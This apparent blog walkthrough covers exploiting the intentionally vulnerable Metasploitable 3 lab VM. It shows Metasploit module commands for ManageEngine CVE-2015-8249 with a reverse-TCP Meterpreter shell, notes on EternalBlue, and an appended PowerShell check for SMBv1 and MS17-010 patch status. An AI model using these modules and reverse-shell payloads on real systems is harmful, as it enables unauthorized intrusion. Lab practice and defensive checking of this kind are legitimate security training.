Metasploitable 3 Exploitation Guide
Hello all, in this post I will be going over the ways to exploit code and gain a shell on Rapid7’s Metasploitable 3 machine. Each vulnerability will be split into its own section and explained with links for reference. I will also go over ways to escalate privileges from LOCAL SERVICE shells to SYSTEM by combining multiple exploits. Each week I will add more, so consider it a rolling post that I will update with each new vulnerability I find and exploit. The link to each section will, as usual, be in the table of contents at the side of the page. If you have any questions feel free to reach out to me on my Twitter or my Discord, both linked at the side. Without further ado, let’s get started.
Links and Resources
These are just some useful links and resources if you get stuck exploiting the machine.
- The project's GitHub Page
- A guide to installing Metasploitable3
- Meterpreter Basics
- Attacking Metasploitable 3 - Metasploit Minute - Mubix
- List of Metasploitable 3 Vulnerabilities
- Details of how Metasploitable 3 is configured
- Metasploit Download
- A Beginners Guide to Metasploit - HackerSploit
NMAP Scan of Metasploitable 3
To make our lives easier I will launch Metasploit with the msfdb run command, which starts msf along with the database used for credential storage. I will also use the setg command to globally set RHOST and LHOST to the IP of Metasploitable 3 and our local IP respectively.
Exploiting Manage Engine - CVE-2015-8249
The first vulnerability we will be exploiting is an outdated Manage Engine Desktop Central installation. There is a CVE with a Metasploit module for it that allows unauthenticated remote code execution as LOCAL SERVICE; the module we will be using is exploit/windows/http/manageengine_connectionid_write. All we need to do is load the module and run exploit, as we have already set RHOST and LHOST with setg. We also need to make sure that we are using a 64-bit payload, as Metasploitable 3 is a 64-bit machine; we can set the correct payload with set payload windows/x64/meterpreter/reverse_tcp.
    use exploit/windows/http/manageengine_connectionid_write
    set payload windows/x64/meterpreter/reverse_tcp
    exploit
Bingo, we got a shell as LOCAL SERVICE.
Here is a link to an in-depth article exploiting this vulnerability - Here
Exploiting EternalBlue, MS17-010
The next vulnerability we will exploit is MS17-010, EternalBlue. Exploiting it is quite simple: all we need to do is load the module in Metasploit and then run the exploit.
Bingo, we got a shell as SYSTEM.
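For the other side of this vulnerability, here is an added PowerShell check (my example, not code from the original post or from the Metasploitable 3 project) that reports whether a Windows host still has the SMBv1 and missing-patch exposure the MS17-010 module relies on, together with the registry change that turns SMBv1 off. Assumptions: it is run as an administrator on the host itself, and the KB numbers are the MS17-010 updates for Windows 7 SP1 / Server 2008 R2 SP1 (other Windows versions use different IDs).

```powershell
# Added example, not from the original post. Assumption: run elevated on the
# host being checked. KB4012212 (security-only) and KB4012215 (monthly rollup)
# are the MS17-010 updates for Windows 7 SP1 / Server 2008 R2 SP1.
$Ms17010Kbs = @('KB4012212', 'KB4012215')
$LanmanParams = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'

function Get-Smb1Status {
    # The server-side SMBv1 switch is the SMB1 DWORD under LanmanServer\Parameters.
    # An absent value means the default, which is enabled on older Windows versions.
    $value = (Get-ItemProperty -Path $LanmanParams -Name 'SMB1' -ErrorAction SilentlyContinue).SMB1
    if ($null -eq $value) { return 'enabled (default, value not set)' }
    if ($value -eq 0)     { return 'disabled' }
    return 'enabled'
}

function Get-Ms17010PatchStatus {
    # Look for either MS17-010 package in the installed-update list.
    $installed = Get-HotFix -ErrorAction SilentlyContinue |
        Where-Object { $Ms17010Kbs -contains $_.HotFixID }
    if ($installed) { return "patched ($($installed.HotFixID -join ', '))" }
    return 'not patched (no MS17-010 update found)'
}

function Disable-Smb1Server {
    # Defence in depth for a host that should not be exploitable: turn SMBv1 off
    # at the server. The change takes effect after the host (or Server service) restarts.
    Set-ItemProperty -Path $LanmanParams -Name 'SMB1' -Type DWord -Value 0 -Force
}

Write-Host "SMBv1 server : $(Get-Smb1Status)"
Write-Host "MS17-010     : $(Get-Ms17010PatchStatus)"
```

On hosts that receive later monthly rollups, Get-HotFix lists the newer rollup rather than these two IDs, so "not patched" here means only that neither March 2017 package is present; confirm against the current rollup before acting on it. Patching or disabling SMBv1 on the Metasploitable 3 VM itself would of course remove the lab exercise, so this is for hosts that should not be vulnerable.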